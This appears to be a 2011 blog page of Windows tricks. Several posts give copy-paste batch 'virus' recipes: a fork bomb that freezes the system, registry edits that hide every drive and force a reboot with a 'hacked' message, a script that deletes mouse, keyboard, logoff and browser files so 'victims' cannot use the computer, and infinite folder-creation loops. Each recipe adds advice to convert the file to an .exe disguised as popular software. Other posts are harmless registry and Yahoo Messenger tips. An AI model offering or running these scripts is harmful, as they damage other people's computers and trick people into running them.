slider

How to lock a folder without any software using Batch Programming

In this post I will tell you how to create a simple folder locker which would hide the folder you want to lock. No software required, its just very simple to create it.

Read More(Full Post)...

Create a virus to make the Computer freezed using Batch Programming

Its a simple, easy to remember, one line batch code which would freeze your computer by eating all its virtual memory. When this piece of code is run, the CPU usage goes to 100%. The computer can be brought to its original state by rebooting the system. Its a great code for the beginners and to play prank with friends.

1. Copy the code present in box below in the NOTEPAD. 


%0|%0

2. Save the file with .bat extension(for eg: crazy.bat)

3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.

Virus to disable all Hard Disk using Batch Programming

 This is a simple batch program to disable the hard disks in windows.

NOTE:  Don't run or execute the bat file after creating it because it will delete the files from your computer only.  

1. Copy the code present in box below in the NOTEPAD. 


REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

2. Save the file with .bat extension(for eg:disableall.bat)

3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.

For more info, Contact me.

Simple Virus to Delete mouse, explorer, logoff, keyboard files

Usually we write simple viruses in batch programming.  This time also I have one Batch Program. It will delete explore.exe, logoff, mouse, keyboard files. So victims can not do anything in his computer.

NOTE:  Don't run or execute the bat file after creating it because it will delete the files from your computer only. 

1. Copy the code present in box below in the NOTEPAD.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

2. Save the file with .bat extension(for eg:deleteall.bat)
3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Create a Virus to Create Folder into a Folder(infinitely)

Well you can create a simple computer virus which will create a folder into a folder and so on.
Follow the below steps to create the virus.

1. Copy the code present in box below in the NOTEPAD.

:123
md d
cd d
goto :123

2. Save the file with .bat extension(for eg: folderscreate.bat)
3. Now go to the location where you saved it and run it by double clicking it.
You are done!!
4. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Create a Virus to Create Infinite Folders in a Drive

Here I will tell you a simple trick to create a simple virus which will create infinite folders into the directory where it is saved, until and unless it is terminated.

1. Copy the code present in box below in the NOTEPAD.

@echo off
:top
md %random%
goto top

"@echo off" - makes it so that it appears to be a blank
screen but actually its making hundreds of folder.
":top" - to create infinite loop.
"md %random%" - is command that creates folders with random names.
"goto top" – return to label 

2. Save the file with .bat extension(for eg: folderscreate.bat)
3. Now go to the location where you saved it and run it by double clicking it.
You are done!!
4. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Add 3D Cu3er (cuber) slider to your Blog or Website

Cu3er is a really neat 3D image slider with crazy visual transitions. This tutorial will help you to integrate cu3er to your  blogger easily. You can see an example how i integrated it into Blogger's header in my blog on the homepage. I will also explain how one can integrate cu3er to header and post and as widget as well.


Step 1




















Read More(Full Post)...

Hide and Remove Shortcut Arrow from Desktop Icons and Other Icons

  1. Goto start in windows and click 'RUN', type 'regedit' and press enter.
  2. Registry Editor will open.
  3. Navigate to the following registry key: HKEY_CLASSES_ROOT\lnkfile
  4. Delete the IsShortcut registry value in the right pane. Tip: It’s also workable to just rename the IsShortcut registry entry to another name, such as IsNotShortcut.
  5. Some other type of documents and files may have shortcut arrows on their icons too. To remove the shortcut arrow overlay image on these icons, navigate to each of the following registry keys, and then repeat step 2 and step 3 above to deactivate the shortcut arrow: HKEY_CLASSES_ROOT\piffile
    HKEY_CLASSES_ROOT\ConferenceLink
    HKEY_CLASSES_ROOT\DocShortCut
    HKEY_CLASSES_ROOT\InternetShortcut
    HKEY_CLASSES_ROOT\WSHFile
  6. Exit from Registry Editor.
  7. Logout and login again or restart Explorer for the change to take effect.

Multiple Login in Yahoo Messenger Without Using any Software

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :
 
1.   Go to Start ----> Run . Type regedit, then enter .

2.  Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo  --->pager---->Test

3.  On the right page , right-click and choose new Dword value .

4.  Rename it as Plural.

5.  Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login

Find who is Invisible on Yahoo messenger

Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
     Sometimes some of your friends who appear offline in yahoo messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

Firstly open your yahoo messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.
Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
After loading the Doodle imvironment there can be two possibilities

1.If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously .See in the picture below:
 

2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page like in the picture below. So you know that the user is online.


Related Posts Plugin for WordPress, Blogger...
 
Download & Learning © 2011 | Contact